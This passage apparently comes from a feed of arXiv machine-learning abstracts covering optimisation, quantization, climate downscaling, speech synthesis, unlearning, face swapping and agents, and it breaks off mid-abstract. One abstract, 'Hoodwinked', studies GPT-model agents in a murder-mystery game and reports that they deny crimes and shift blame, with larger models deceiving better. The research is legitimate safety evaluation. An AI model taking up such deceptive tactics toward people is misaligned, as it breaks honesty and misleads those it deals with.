    We study the online overlapping batch-means covariance estimator for Stochastic Gradient Descent (SGD) under Markovian sampling. We show that the convergence rates of the covariance estimator are $O\big(\sqrt{d}\,n^{-1/8}(\log n)^{1/4}\big)$ and $O\big(\sqrt{d}\,n^{-1/8}\big)$ under state-dependent and state-independent Markovian sampling, respectively, with $d$ representing dimensionality and $n$ denoting the number of observations or SGD iterations. Remarkably, these rates match the best-known convergence rate previously established for the independent and identically distributed ($\iid$) case by \cite{zhu2021online}, up to logarithmic factors. Our analysis overcomes significant challenges that arise due to Markovian sampling, leading to the introduction of additional error terms and complex dependencies between the blocks of the batch-means covariance estimator. Moreover, we establish the convergence rate for the first four moments of the $\ell_2$ norm of the error of SGD dynamics under state-dependent Markovian data, which holds potential interest as an independent result. To validate our theoretical findings, we provide numerical illustrations to derive confidence intervals for SGD when training linear and logistic regression models under Markovian sampling. Additionally, we apply our approach to tackle the intriguing problem of strategic classification with logistic regression, where adversaries can adaptively modify features during the training process to increase their chances of being classified in a specific target class.
    Efficiency of First-Order Methods for Low-Rank Tensor Recovery with the Tensor Nuclear Norm Under Strict Complementarity. (arXiv:2308.01677v1 [math.OC])
    We consider convex relaxations for recovering low-rank tensors based on constrained minimization over a ball induced by the tensor nuclear norm, recently introduced in \cite{tensor_tSVD}. We build on a recent line of results that considered convex relaxations for the recovery of low-rank matrices and established that under a strict complementarity condition (SC), both the convergence rate and per-iteration runtime of standard gradient methods may improve dramatically. We develop the appropriate strict complementarity condition for the tensor nuclear norm ball and obtain the following main results under this condition: 1. When the objective to minimize is of the form $f(\mX)=g(\mA\mX)+\langle{\mC,\mX}\rangle$ , where $g$ is strongly convex and $\mA$ is a linear map (e.g., least squares), a quadratic growth bound holds, which implies linear convergence rates for standard projected gradient methods, despite the fact that $f$ need not be strongly convex. 2. For a smooth objective function, when initialized in certain proximity of an optimal solution which satisfies SC, standard projected gradient methods only require SVD computations (for projecting onto the tensor nuclear norm ball) of rank that matches the tubal rank of the optimal solution. In particular, when the tubal rank is constant, this implies nearly linear (in the size of the tensor) runtime per iteration, as opposed to super linear without further assumptions. 3. For a nonsmooth objective function which admits a popular smooth saddle-point formulation, we derive similar results to the latter for the well known extragradient method. An additional contribution which may be of independent interest, is the rigorous extension of many basic results regarding tensors of arbitrary order, which were previously obtained only for third-order tensors.
    Compressed and distributed least-squares regression: convergence rates with applications to Federated Learning. (arXiv:2308.01358v1 [cs.LG])
    In this paper, we investigate the impact of compression on stochastic gradient algorithms for machine learning, a technique widely used in distributed and federated learning. We underline differences in terms of convergence rates between several unbiased compression operators, that all satisfy the same condition on their variance, thus going beyond the classical worst-case analysis. To do so, we focus on the case of least-squares regression (LSR) and analyze a general stochastic approximation algorithm for minimizing quadratic functions relying on a random field. We consider weak assumptions on the random field, tailored to the analysis (specifically, expected H\"older regularity), and on the noise covariance, enabling the analysis of various randomizing mechanisms, including compression. We then extend our results to the case of federated learning. More formally, we highlight the impact on the convergence of the covariance $\mathfrak{C}_{\mathrm{ania}}$ of the additive noise induced by the algorithm. We demonstrate despite the non-regularity of the stochastic field, that the limit variance term scales with $\mathrm{Tr}(\mathfrak{C}_{\mathrm{ania}} H^{-1})/K$ (where $H$ is the Hessian of the optimization problem and $K$ the number of iterations) generalizing the rate for the vanilla LSR case where it is $\sigma^2 \mathrm{Tr}(H H^{-1}) / K = \sigma^2 d / K$ (Bach and Moulines, 2013). Then, we analyze the dependency of $\mathfrak{C}_{\mathrm{ania}}$ on the compression strategy and ultimately its impact on convergence, first in the centralized case, then in two heterogeneous FL frameworks.
    Learning from Data Streams: An Overview and Update. (arXiv:2212.14720v2 [cs.LG] UPDATED)
    The literature on machine learning in the context of data streams is vast and growing. However, many of the defining assumptions regarding data-stream learning tasks are too strong to hold in practice, or are even contradictory such that they cannot be met in the contexts of supervised learning. Algorithms are chosen and designed based on criteria which are often not clearly stated, for problem settings not clearly defined, tested in unrealistic settings, and/or in isolation from related approaches in the wider literature. This puts into question the potential for real-world impact of many approaches conceived in such contexts, and risks propagating a misguided research focus. We propose to tackle these issues by reformulating the fundamental definitions and settings of supervised data-stream learning with regard to contemporary considerations of concept drift and temporal dependence; and we take a fresh look at what constitutes a supervised data-stream learning task, and a reconsideration of algorithms that may be applied to tackle such tasks. Through and in reflection of this formulation and overview, helped by an informal survey of industrial players dealing with real-world data streams, we provide recommendations. Our main emphasis is that learning from data streams does not impose a single-pass or online-learning approach, or any particular learning regime; and any constraints on memory and time are not specific to streaming. Meanwhile, there exist established techniques for dealing with temporal dependence and concept drift, in other areas of the literature. For the data streams community, we thus encourage a shift in research focus, from dealing with often-artificial constraints and assumptions on the learning mode, to issues such as robustness, privacy, and interpretability which are increasingly relevant to learning in data streams in academic and industrial settings.
    MRQ:Support Multiple Quantization Schemes through Model Re-Quantization. (arXiv:2308.01867v1 [cs.LG])
    Despite the proliferation of diverse hardware accelerators (e.g., NPU, TPU, DPU), deploying deep learning models on edge devices with fixed-point hardware is still challenging due to complex model quantization and conversion. Existing model quantization frameworks like Tensorflow QAT [1], TFLite PTQ [2], and Qualcomm AIMET [3] supports only a limited set of quantization schemes (e.g., only asymmetric per-tensor quantization in TF1.x QAT [4]). Accordingly, deep learning models cannot be easily quantized for diverse fixed-point hardwares, mainly due to slightly different quantization requirements. In this paper, we envision a new type of model quantization approach called MRQ (model re-quantization), which takes existing quantized models and quickly transforms the models to meet different quantization requirements (e.g., asymmetric -> symmetric, non-power-of-2 scale -> power-of-2 scale). Re-quantization is much simpler than quantizing from scratch because it avoids costly re-training and provides support for multiple quantization schemes simultaneously. To minimize re-quantization error, we developed a new set of re-quantization algorithms including weight correction and rounding error folding. We have demonstrated that MobileNetV2 QAT model [7] can be quickly re-quantized into two different quantization schemes (i.e., symmetric and symmetric+power-of-2 scale) with less than 0.64 units of accuracy loss. We believe our work is the first to leverage this concept of re-quantization for model quantization and models obtained from the re-quantization process have been successfully deployed on NNA in the Echo Show devices.
    Exact identification of nonlinear dynamical systems by Trimmed Lasso. (arXiv:2308.01891v1 [cs.LG])
    Identification of nonlinear dynamical systems has been popularized by sparse identification of the nonlinear dynamics (SINDy) via the sequentially thresholded least squares (STLS) algorithm. Many extensions SINDy have emerged in the literature to deal with experimental data which are finite in length and noisy. Recently, the computationally intensive method of ensembling bootstrapped SINDy models (E-SINDy) was proposed for model identification, handling finite, highly noisy data. While the extensions of SINDy are numerous, their sparsity-promoting estimators occasionally provide sparse approximations of the dynamics as opposed to exact recovery. Furthermore, these estimators suffer under multicollinearity, e.g. the irrepresentable condition for the Lasso. In this paper, we demonstrate that the Trimmed Lasso for robust identification of models (TRIM) can provide exact recovery under more severe noise, finite data, and multicollinearity as opposed to E-SINDy. Additionally, the computational cost of TRIM is asymptotically equal to STLS since the sparsity parameter of the TRIM can be solved efficiently by convex solvers. We compare these methodologies on challenging nonlinear systems, specifically the Lorenz 63 system, the Bouc Wen oscillator from the nonlinear dynamics benchmark of No\"el and Schoukens, 2016, and a time delay system describing tool cutting dynamics. This study emphasizes the comparisons between STLS, reweighted $\ell_1$ minimization, and Trimmed Lasso in identification with respect to problems faced by practitioners: the problem of finite and noisy data, the performance of the sparse regression of when the library grows in dimension (multicollinearity), and automatic methods for choice of regularization parameters.
    Multi-variable Hard Physical Constraints for Climate Model Downscaling. (arXiv:2308.01868v1 [physics.ao-ph])
    Global Climate Models (GCMs) are the primary tool to simulate climate evolution and assess the impacts of climate change. However, they often operate at a coarse spatial resolution that limits their accuracy in reproducing local-scale phenomena. Statistical downscaling methods leveraging deep learning offer a solution to this problem by approximating local-scale climate fields from coarse variables, thus enabling regional GCM projections. Typically, climate fields of different variables of interest are downscaled independently, resulting in violations of fundamental physical properties across interconnected variables. This study investigates the scope of this problem and, through an application on temperature, lays the foundation for a framework introducing multi-variable hard constraints that guarantees physical relationships between groups of downscaled climate variables.
    Hoodwinked: Deception and Cooperation in a Text-Based Game for Language Models. (arXiv:2308.01404v1 [cs.CL])
    Are current language models capable of deception and lie detection? We study this question by introducing a text-based game called $\textit{Hoodwinked}$, inspired by $\textit{Mafia}$ and $\textit{Among Us}$. Players are locked in a house and must find a key to escape, but one player is tasked with killing the others. Each time a murder is committed, the surviving players have a natural language discussion then vote to banish one player from the game. We conduct experiments with agents controlled by GPT-3, GPT-3.5, and GPT-4 and find evidence of deception and lie detection capabilities. The killer often denies their crime and accuses others, leading to measurable effects on voting outcomes. More advanced models are more effective killers, outperforming smaller models in 18 of 24 pairwise comparisons. Secondary metrics provide evidence that this improvement is not mediated by different actions, but rather by stronger deception capabilities during discussions. Overall, we find substantial evidence that current language models are capable of deception. To better evaluate the ability of AI agents to deceive humans, we make this game publicly available at https://hoodwinked.ai/ .
    Novel Physics-Based Machine-Learning Models for Indoor Air Quality Approximations. (arXiv:2308.01438v1 [cs.LG])
    Cost-effective sensors are capable of real-time capturing a variety of air quality-related modalities from different pollutant concentrations to indoor/outdoor humidity and temperature. Machine learning (ML) models are capable of performing air-quality "ahead-of-time" approximations. Undoubtedly, accurate indoor air quality approximation significantly helps provide a healthy indoor environment, optimize associated energy consumption, and offer human comfort. However, it is crucial to design an ML architecture to capture the domain knowledge, so-called problem physics. In this study, we propose six novel physics-based ML models for accurate indoor pollutant concentration approximations. The proposed models include an adroit combination of state-space concepts in physics, Gated Recurrent Units, and Decomposition techniques. The proposed models were illustrated using data collected from five offices in a commercial building in California. The proposed models are shown to be less complex, computationally more efficient, and more accurate than similar state-of-the-art transformer-based models. The superiority of the proposed models is due to their relatively light architecture (computational efficiency) and, more importantly, their ability to capture the underlying highly nonlinear patterns embedded in the often contaminated sensor-collected indoor air quality temporal data.
    Adversarial Training of Denoising Diffusion Model Using Dual Discriminators for High-Fidelity Multi-Speaker TTS. (arXiv:2308.01573v1 [cs.SD])
    The diffusion model is capable of generating high-quality data through a probabilistic approach. However, it suffers from the drawback of slow generation speed due to the requirement of a large number of time steps. To address this limitation, recent models such as denoising diffusion implicit models (DDIM) focus on generating samples without directly modeling the probability distribution, while models like denoising diffusion generative adversarial networks (GAN) combine diffusion processes with GANs. In the field of speech synthesis, a recent diffusion speech synthesis model called DiffGAN-TTS, utilizing the structure of GANs, has been introduced and demonstrates superior performance in both speech quality and generation speed. In this paper, to further enhance the performance of DiffGAN-TTS, we propose a speech synthesis model with two discriminators: a diffusion discriminator for learning the distribution of the reverse process and a spectrogram discriminator for learning the distribution of the generated data. Objective metrics such as structural similarity index measure (SSIM), mel-cepstral distortion (MCD), F0 root mean squared error (F0 RMSE), short-time objective intelligibility (STOI), perceptual evaluation of speech quality (PESQ), as well as subjective metrics like mean opinion score (MOS), are used to evaluate the performance of the proposed model. The evaluation results show that the proposed model outperforms recent state-of-the-art models such as FastSpeech2 and DiffGAN-TTS in various metrics. Our implementation and audio samples are located on GitHub.
    Model Sparsity Can Simplify Machine Unlearning. (arXiv:2304.04934v7 [cs.LG] UPDATED)
    In response to recent data regulation requirements, machine unlearning (MU) has emerged as a critical process to remove the influence of specific examples from a given model. Although exact unlearning can be achieved through complete model retraining using the remaining dataset, the associated computational costs have driven the development of efficient, approximate unlearning techniques. Moving beyond data-centric MU approaches, our study introduces a novel model-based perspective: model sparsification via weight pruning, which is capable of reducing the gap between exact unlearning and approximate unlearning. We show in both theory and practice that model sparsity can boost the multi-criteria unlearning performance of an approximate unlearner, closing the approximation gap, while continuing to be efficient. This leads to a new MU paradigm, termed prune first, then unlearn, which infuses a sparse model prior into the unlearning process. Building on this insight, we also develop a sparsity-aware unlearning method that utilizes sparsity regularization to enhance the training process of approximate unlearning. Extensive experiments show that our proposals consistently benefit MU in various unlearning scenarios. A notable highlight is the 77% unlearning efficacy gain of fine-tuning (one of the simplest unlearning methods) when using sparsity-aware unlearning. Furthermore, we demonstrate the practical impact of our proposed MU methods in addressing other machine learning challenges, such as defending against backdoor attacks and enhancing transfer learning. Codes are available at https://github.com/OPTML-Group/Unlearn-Sparse.
    Job Shop Scheduling via Deep Reinforcement Learning: a Sequence to Sequence approach. (arXiv:2308.01797v1 [cs.AI])
    Job scheduling is a well-known Combinatorial Optimization problem with endless applications. Well planned schedules bring many benefits in the context of automated systems: among others, they limit production costs and waste. Nevertheless, the NP-hardness of this problem makes it essential to use heuristics whose design is difficult, requires specialized knowledge and often produces methods tailored to the specific task. This paper presents an original end-to-end Deep Reinforcement Learning approach to scheduling that automatically learns dispatching rules. Our technique is inspired by natural language encoder-decoder models for sequence processing and has never been used, to the best of our knowledge, for scheduling purposes. We applied and tested our method in particular to some benchmark instances of Job Shop Problem, but this technique is general enough to be potentially used to tackle other different optimal job scheduling tasks with minimal intervention. Results demonstrate that we outperform many classical approaches exploiting priority dispatching rules and show competitive results on state-of-the-art Deep Reinforcement Learning ones.
    Motion Planning Diffusion: Learning and Planning of Robot Motions with Diffusion Models. (arXiv:2308.01557v1 [cs.RO])
    Learning priors on trajectory distributions can help accelerate robot motion planning optimization. Given previously successful plans, learning trajectory generative models as priors for a new planning problem is highly desirable. Prior works propose several ways on utilizing this prior to bootstrapping the motion planning problem. Either sampling the prior for initializations or using the prior distribution in a maximum-a-posterior formulation for trajectory optimization. In this work, we propose learning diffusion models as priors. We then can sample directly from the posterior trajectory distribution conditioned on task goals, by leveraging the inverse denoising process of diffusion models. Furthermore, diffusion has been recently shown to effectively encode data multimodality in high-dimensional settings, which is particularly well-suited for large trajectory dataset. To demonstrate our method efficacy, we compare our proposed method - Motion Planning Diffusion - against several baselines in simulated planar robot and 7-dof robot arm manipulator environments. To assess the generalization capabilities of our method, we test it in environments with previously unseen obstacles. Our experiments show that diffusion models are strong priors to encode high-dimensional trajectory distributions of robot motions.
    Distribution-Free Inference for the Regression Function of Binary Classification. (arXiv:2308.01835v1 [stat.ML])
    One of the key objects of binary classification is the regression function, i.e., the conditional expectation of the class labels given the inputs. With the regression function not only a Bayes optimal classifier can be defined, but it also encodes the corresponding misclassification probabilities. The paper presents a resampling framework to construct exact, distribution-free and non-asymptotically guaranteed confidence regions for the true regression function for any user-chosen confidence level. Then, specific algorithms are suggested to demonstrate the framework. It is proved that the constructed confidence regions are strongly consistent, that is, any false model is excluded in the long run with probability one. The exclusion is quantified with probably approximately correct type bounds, as well. Finally, the algorithms are validated via numerical experiments, and the methods are compared to approximate asymptotic confidence ellipsoids.
    Minimax Optimal $Q$ Learning with Nearest Neighbors. (arXiv:2308.01490v1 [cs.LG])
    $Q$ learning is a popular model free reinforcement learning method. Most of existing works focus on analyzing $Q$ learning for finite state and action spaces. If the state space is continuous, then the original $Q$ learning method can not be directly used. A modification of the original $Q$ learning method was proposed in (Shah and Xie, 2018), which estimates $Q$ values with nearest neighbors. Such modification makes $Q$ learning suitable for continuous state space. (Shah and Xie, 2018) shows that the convergence rate of estimated $Q$ function is $\tilde{O}(T^{-1/(d+3)})$, which is slower than the minimax lower bound $\tilde{\Omega}(T^{-1/(d+2)})$, indicating that this method is not efficient. This paper proposes two new $Q$ learning methods to bridge the gap of convergence rates in (Shah and Xie, 2018), with one of them being offline, while the other is online. Despite that we still use nearest neighbor approach to estimate $Q$ function, the algorithms are crucially different from (Shah and Xie, 2018). In particular, we replace the kernel nearest neighbor in discretized region with a direct nearest neighbor approach. Consequently, our approach significantly improves the convergence rate. Moreover, the time complexity is also significantly improved in high dimensional state spaces. Our analysis shows that both offline and online methods are minimax rate optimal.
    MFIM: Megapixel Facial Identity Manipulation. (arXiv:2308.01536v1 [cs.CV])
    Face swapping is a task that changes a facial identity of a given image to that of another person. In this work, we propose a novel face-swapping framework called Megapixel Facial Identity Manipulation (MFIM). The face-swapping model should achieve two goals. First, it should be able to generate a high-quality image. We argue that a model which is proficient in generating a megapixel image can achieve this goal. However, generating a megapixel image is generally difficult without careful model design. Therefore, our model exploits pretrained StyleGAN in the manner of GAN-inversion to effectively generate a megapixel image. Second, it should be able to effectively transform the identity of a given image. Specifically, it should be able to actively transform ID attributes (e.g., face shape and eyes) of a given image into those of another person, while preserving ID-irrelevant attributes (e.g., pose and expression). To achieve this goal, we exploit 3DMM that can capture various facial attributes. Specifically, we explicitly supervise our model to generate a face-swapped image with the desirable attributes using 3DMM. We show that our model achieves state-of-the-art performance through extensive experiments. Furthermore, we propose a new operation called ID mixing, which creates a new identity by semantically mixing the identities of several people. It allows the user to customize the new identity.
    Regularization, early-stopping and dreaming: a Hopfield-like setup to address generalization and overfitting. (arXiv:2308.01421v1 [cs.LG])
    In this work we approach attractor neural networks from a machine learning perspective: we look for optimal network parameters by applying a gradient descent over a regularized loss function. Within this framework, the optimal neuron-interaction matrices turn out to be a class of matrices which correspond to Hebbian kernels revised by iteratively applying some unlearning protocols. Remarkably, the number of unlearning steps is proved to be related to the regularization hyperparameters of the loss function and to the training time. Thus, we can design strategies to avoid overfitting that are formulated in terms of the algebraic properties of the interaction matrix, or, equivalently, in terms of regularization tuning and early-stopping strategies. The generalization capabilities of these attractor networks are also investigated: analytical results are obtained for random synthetic datasets, next, the emerging picture is corroborated by numerical experiments that highlight the existence of several regimes (i.e., overfitting, failure and success) as the dataset parameters are varied.
    OpenAGI: When LLM Meets Domain Experts. (arXiv:2304.04370v5 [cs.AI] UPDATED)
    Human intelligence excels at combining basic skills to solve complex tasks. This capability is vital for Artificial Intelligence (AI) and should be embedded in comprehensive intelligent models, enabling them to harness expert models for complex task-solving towards Artificial General Intelligence (AGI). Large Language Models (LLMs) show promising learning and reasoning abilities, and can effectively use external models, tools or APIs to tackle complex problems. In this work, we introduce OpenAGI, an open-source AGI research platform designed for multi-step, real-world tasks. Specifically, OpenAGI uses a dual strategy, integrating standard benchmark tasks for benchmarking and evaluation, and open-ended tasks including more expandable models, tools or APIs for creative problem-solving. Tasks are presented as natural language queries to the LLM, which then selects and executes appropriate models. We also propose a Reinforcement Learning from Task Feedback (RLTF) mechanism that uses task results to improve the LLM's ability, which creates a self-improving AI feedback loop. While we acknowledge that AGI is a broad and multifaceted research challenge with no singularly defined solution path, the integration of LLMs with domain-specific expert models, inspired by mirroring the blend of general and specialized intelligence in humans, offers a promising approach towards AGI. We are open-sourcing the OpenAGI project's code, dataset, benchmarks, evaluation methods, and demo to foster community involvement in AGI advancement: https://github.com/agiresearch/OpenAGI.  ( 3 min )
    Computational Long Exposure Mobile Photography. (arXiv:2308.01379v1 [cs.CV])
    Long exposure photography produces stunning imagery, representing moving elements in a scene with motion-blur. It is generally employed in two modalities, producing either a foreground or a background blur effect. Foreground blur images are traditionally captured on a tripod-mounted camera and portray blurred moving foreground elements, such as silky water or light trails, over a perfectly sharp background landscape. Background blur images, also called panning photography, are captured while the camera is tracking a moving subject, to produce an image of a sharp subject over a background blurred by relative motion. Both techniques are notoriously challenging and require additional equipment and advanced skills. In this paper, we describe a computational burst photography system that operates in a hand-held smartphone camera app, and achieves these effects fully automatically, at the tap of the shutter button. Our approach first detects and segments the salient subject. We track the scene motion over multiple frames and align the images in order to preserve desired sharpness and to produce aesthetically pleasing motion streaks. We capture an under-exposed burst and select the subset of input frames that will produce blur trails of controlled length, regardless of scene or camera motion velocity. We predict inter-frame motion and synthesize motion-blur to fill the temporal gaps between the input frames. Finally, we composite the blurred image with the sharp regular exposure to protect the sharpness of faces or areas of the scene that are barely moving, and produce a final high resolution and high dynamic range (HDR) photograph. Our system democratizes a capability previously reserved to professionals, and makes this creative style accessible to most casual photographers. More information and supplementary material can be found on our project webpage: https://motion-mode.github.io/  ( 3 min )
    Computer Vision Estimation of Emotion Reaction Intensity in the Wild. (arXiv:2303.10741v2 [cs.CV] UPDATED)
    Emotions play an essential role in human communication. Developing computer vision models for automatic recognition of emotion expression can aid in a variety of domains, including robotics, digital behavioral healthcare, and media analytics. There are three types of emotional representations which are traditionally modeled in affective computing research: Action Units, Valence Arousal (VA), and Categorical Emotions. As part of an effort to move beyond these representations towards more fine-grained labels, we describe our submission to the newly introduced Emotional Reaction Intensity (ERI) Estimation challenge in the 5th competition for Affective Behavior Analysis in-the-Wild (ABAW). We developed four deep neural networks trained in the visual domain and a multimodal model trained with both visual and audio features to predict emotion reaction intensity. Our best performing model on the Hume-Reaction dataset achieved an average Pearson correlation coefficient of 0.4080 on the test set using a pre-trained ResNet50 model. This work provides a first step towards the development of production-grade models which predict emotion reaction intensities rather than discrete emotion categories.  ( 2 min )
    Quantification of Predictive Uncertainty via Inference-Time Sampling. (arXiv:2308.01731v1 [cs.LG])
    Predictive variability due to data ambiguities has typically been addressed via construction of dedicated models with built-in probabilistic capabilities that are trained to predict uncertainty estimates as variables of interest. These approaches require distinct architectural components and training mechanisms, may include restrictive assumptions and exhibit overconfidence, i.e., high confidence in imprecise predictions. In this work, we propose a post-hoc sampling strategy for estimating predictive uncertainty accounting for data ambiguity. The method can generate different plausible outputs for a given input and does not assume parametric forms of predictive distributions. It is architecture agnostic and can be applied to any feed-forward deterministic network without changes to the architecture or training procedure. Experiments on regression tasks on imaging and non-imaging input data show the method's ability to generate diverse and multi-modal predictive distributions, and a desirable correlation of the estimated uncertainty with the prediction error.  ( 2 min )
    Curricular Transfer Learning for Sentence Encoded Tasks. (arXiv:2308.01849v1 [cs.CL])
    Fine-tuning language models in a downstream task is the standard approach for many state-of-the-art methodologies in the field of NLP. However, when the distribution between the source task and target task drifts, \textit{e.g.}, conversational environments, these gains tend to be diminished. This article proposes a sequence of pre-training steps (a curriculum) guided by "data hacking" and grammar analysis that allows further gradual adaptation between pre-training distributions. In our experiments, we acquire a considerable improvement from our method compared to other known pre-training approaches for the MultiWoZ task.  ( 2 min )
    An Introduction to Bi-level Optimization: Foundations and Applications in Signal Processing and Machine Learning. (arXiv:2308.00788v2 [cs.LG] UPDATED)
    Recently, bi-level optimization (BLO) has taken center stage in some very exciting developments in the area of signal processing (SP) and machine learning (ML). Roughly speaking, BLO is a classical optimization problem that involves two levels of hierarchy (i.e., upper and lower levels), wherein obtaining the solution to the upper-level problem requires solving the lower-level one. BLO has become popular largely because it is powerful in modeling problems in SP and ML, among others, that involve optimizing nested objective functions. Prominent applications of BLO range from resource allocation for wireless systems to adversarial machine learning. In this work, we focus on a class of tractable BLO problems that often appear in SP and ML applications. We provide an overview of some basic concepts of this class of BLO problems, such as their optimality conditions, standard algorithms (including their optimization principles and practical implementations), as well as how they can be leveraged to obtain state-of-the-art results for a number of key SP and ML applications. Further, we discuss some recent advances in BLO theory, its implications for applications, and point out some limitations of the state-of-the-art that require significant future research efforts. Overall, we hope that this article can serve to accelerate the adoption of BLO as a generic tool to model, analyze, and innovate on a wide array of emerging SP and ML applications.  ( 3 min )
    A Missing Value Filling Model Based on Feature Fusion Enhanced Autoencoder. (arXiv:2208.13495v2 [cs.LG] UPDATED)
    With the advent of the big data era, the data quality problem is becoming more critical. Among many factors, data with missing values is one primary issue, and thus developing effective imputation models is a key topic in the research community. Recently, a major research direction is to employ neural network models such as self-organizing mappings or automatic encoders for filling missing values. However, these classical methods can hardly discover interrelated features and common features simultaneously among data attributes. Especially, it is a very typical problem for classical autoencoders that they often learn invalid constant mappings, which dramatically hurts the filling performance. To solve the above-mentioned problems, we propose a missing-value-filling model based on a feature-fusion-enhanced autoencoder. We first incorporate into an autoencoder a hidden layer that consists of de-tracking neurons and radial basis function neurons, which can enhance the ability of learning interrelated features and common features. Besides, we develop a missing value filling strategy based on dynamic clustering that is incorporated into an iterative optimization process. This design can enhance the multi-dimensional feature fusion ability and thus improves the dynamic collaborative missing-value-filling performance. The effectiveness of the proposed model is validated by extensive experiments compared to a variety of baseline methods on thirteen data sets.  ( 2 min )
    Hebbian Deep Learning Without Feedback. (arXiv:2209.11883v2 [cs.NE] UPDATED)
    Recent approximations to backpropagation (BP) have mitigated many of BP's computational inefficiencies and incompatibilities with biology, but important limitations still remain. Moreover, the approximations significantly decrease accuracy in benchmarks, suggesting that an entirely different approach may be more fruitful. Here, grounded on recent theory for Hebbian learning in soft winner-take-all networks, we present multilayer SoftHebb, i.e. an algorithm that trains deep neural networks, without any feedback, target, or error signals. As a result, it achieves efficiency by avoiding weight transport, non-local plasticity, time-locking of layer updates, iterative equilibria, and (self-) supervisory or other feedback signals -- which were necessary in other approaches. Its increased efficiency and biological compatibility do not trade off accuracy compared to state-of-the-art bio-plausible learning, but rather improve it. With up to five hidden layers and an added linear classifier, accuracies on MNIST, CIFAR-10, STL-10, and ImageNet, respectively reach 99.4%, 80.3%, 76.2%, and 27.3%. In conclusion, SoftHebb shows with a radically different approach from BP that Deep Learning over few layers may be plausible in the brain and increases the accuracy of bio-plausible machine learning. Code is available at https://github.com/NeuromorphicComputing/SoftHebb.  ( 2 min )
    Efficient neural supersampling on a novel gaming dataset. (arXiv:2308.01483v1 [cs.CV])
    Real-time rendering for video games has become increasingly challenging due to the need for higher resolutions, framerates and photorealism. Supersampling has emerged as an effective solution to address this challenge. Our work introduces a novel neural algorithm for supersampling rendered content that is 4 times more efficient than existing methods while maintaining the same level of accuracy. Additionally, we introduce a new dataset which provides auxiliary modalities such as motion vectors and depth generated using graphics rendering features like viewport jittering and mipmap biasing at different resolutions. We believe that this dataset fills a gap in the current dataset landscape and can serve as a valuable resource to help measure progress in the field and advance the state-of-the-art in super-resolution techniques for gaming content.  ( 2 min )
    Automatically Bounding the Taylor Remainder Series: Tighter Bounds and New Applications. (arXiv:2212.11429v3 [cs.LG] UPDATED)
    We present a new algorithm for automatically bounding the Taylor remainder series. In the special case of a scalar function $f: \mathbb{R} \to \mathbb{R}$, our algorithm takes as input a reference point $x_0$, trust region $[a, b]$, and integer $k \ge 1$, and returns an interval $I$ such that $f(x) - \sum_{i=0}^{k-1} \frac {1} {i!} f^{(i)}(x_0) (x - x_0)^i \in I (x - x_0)^k$ for all $x \in [a, b]$. As in automatic differentiation, the function $f$ is provided to the algorithm in symbolic form, and must be composed of known atomic functions. At a high level, our algorithm has two steps. First, for a variety of commonly-used elementary functions (e.g., $\exp$, $\log$), we use recently-developed theory to derive sharp polynomial upper and lower bounds on the Taylor remainder series. We then recursively combine the bounds for the elementary functions using an interval arithmetic variant of Taylor-mode automatic differentiation. Our algorithm can make efficient use of machine learning hardware accelerators, and we provide an open source implementation in JAX. We then turn our attention to applications. Most notably, in a companion paper we use our new machinery to create the first universal majorization-minimization optimization algorithms: algorithms that iteratively minimize an arbitrary loss using a majorizer that is derived automatically, rather than by hand. We also show that our automatically-derived bounds can be used for verified global optimization and numerical integration, and to prove sharper versions of Jensen's inequality.  ( 3 min )
    Assessing Systematic Weaknesses of DNNs using Counterfactuals. (arXiv:2308.01614v1 [cs.LG])
    With the advancement of DNNs into safety-critical applications, testing approaches for such models have gained more attention. A current direction is the search for and identification of systematic weaknesses that put safety assumptions based on average performance values at risk. Such weaknesses can take on the form of (semantically coherent) subsets or areas in the input space where a DNN performs systematically worse than its expected average. However, it is non-trivial to attribute the reason for such observed low performances to the specific semantic features that describe the subset. For instance, inhomogeneities within the data w.r.t. other (non-considered) attributes might distort results. However, taking into account all (available) attributes and their interaction is often computationally highly expensive. Inspired by counterfactual explanations, we propose an effective and computationally cheap algorithm to validate the semantic attribution of existing subsets, i.e., to check whether the identified attribute is likely to have caused the degraded performance. We demonstrate this approach on an example from the autonomous driving domain using highly annotated simulated data, where we show for a semantic segmentation model that (i) performance differences among the different pedestrian assets exist, but (ii) only in some cases is the asset type itself the reason for this reduction in the performance.  ( 2 min )
    ChatMOF: An Autonomous AI System for Predicting and Generating Metal-Organic Frameworks. (arXiv:2308.01423v1 [cs.CL])
    ChatMOF is an autonomous Artificial Intelligence (AI) system that is built to predict and generate of metal-organic frameworks (MOFs). By leveraging a large-scale language model (gpt-3.5-turbo), ChatMOF extracts key details from textual inputs and delivers appropriate responses, thus eliminating the necessity for rigid structured queries. The system is comprised of three core components (i.e. an agent, a toolkit, and an evaluator) and it forms a robust pipeline that manages a variety of tasks, including data retrieval, property prediction, and structure generation. The study further explores the merits and constraints of using large language models (LLMs) AI system in material sciences using and showcases its transformative potential for future advancements.  ( 2 min )
    Learning to Model the World with Language. (arXiv:2308.01399v1 [cs.CL])
    To interact with humans in the world, agents need to understand the diverse types of language that people use, relate them to the visual world, and act based on them. While current agents learn to execute simple language instructions from task rewards, we aim to build agents that leverage diverse language that conveys general knowledge, describes the state of the world, provides interactive feedback, and more. Our key idea is that language helps agents predict the future: what will be observed, how the world will behave, and which situations will be rewarded. This perspective unifies language understanding with future prediction as a powerful self-supervised learning objective. We present Dynalang, an agent that learns a multimodal world model that predicts future text and image representations and learns to act from imagined model rollouts. Unlike traditional agents that use language only to predict actions, Dynalang acquires rich language understanding by using past language also to predict future language, video, and rewards. In addition to learning from online interaction in an environment, Dynalang can be pretrained on datasets of text, video, or both without actions or rewards. From using language hints in grid worlds to navigating photorealistic scans of homes, Dynalang utilizes diverse types of language to improve task performance, including environment descriptions, game rules, and instructions.  ( 2 min )
    DualCoOp++: Fast and Effective Adaptation to Multi-Label Recognition with Limited Annotations. (arXiv:2308.01890v1 [cs.CV])
    Multi-label image recognition in the low-label regime is a task of great challenge and practical significance. Previous works have focused on learning the alignment between textual and visual spaces to compensate for limited image labels, yet may suffer from reduced accuracy due to the scarcity of high-quality multi-label annotations. In this research, we leverage the powerful alignment between textual and visual features pretrained with millions of auxiliary image-text pairs. We introduce an efficient and effective framework called Evidence-guided Dual Context Optimization (DualCoOp++), which serves as a unified approach for addressing partial-label and zero-shot multi-label recognition. In DualCoOp++ we separately encode evidential, positive, and negative contexts for target classes as parametric components of the linguistic input (i.e., prompts). The evidential context aims to discover all the related visual content for the target class, and serves as guidance to aggregate positive and negative contexts from the spatial domain of the image, enabling better distinguishment between similar categories. Additionally, we introduce a Winner-Take-All module that promotes inter-class interaction during training, while avoiding the need for extra parameters and costs. As DualCoOp++ imposes minimal additional learnable overhead on the pretrained vision-language framework, it enables rapid adaptation to multi-label recognition tasks with limited annotations and even unseen classes. Experiments on 